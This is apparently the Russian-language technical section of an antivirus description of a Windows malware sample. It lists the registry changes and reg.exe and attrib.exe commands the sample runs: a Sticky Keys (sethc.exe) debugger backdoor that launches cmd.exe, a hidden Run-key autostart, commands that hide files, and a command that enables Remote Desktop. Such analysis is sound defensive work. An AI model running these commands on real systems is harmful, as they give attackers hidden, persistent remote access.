Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'debugger' = 'c:\ntldr.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = '<SYSTEM32>\cmd.exe'
- <SYSTEM32>\sethc.exe
- скрытых файлов
- <SYSTEM32>\attrib.exe +h +r c:\ntldr.exe
- <SYSTEM32>\reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f /t REG_DWORD /d 0
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v debugger /t REG_SZ /f /d c:\ntldr.exe
- <SYSTEM32>\attrib.exe +h +r <SYSTEM32>\ntldr.exe
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /f /t REG_DWORD /d 2
- <SYSTEM32>\attrib.exe +h <SYSTEM32>\GroupPolicy\Machine\Scripts\scripts.ini
- <SYSTEM32>\attrib.exe -h <SYSTEM32>\GroupPolicy\Machine\Scripts\scripts.ini
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /f /d 0
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /f /d <SYSTEM32>\cmd.exe
- <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\ntldr.bat
- <SYSTEM32>\sethc
- ClassName: 'Shell_TrayWnd' WindowName: ''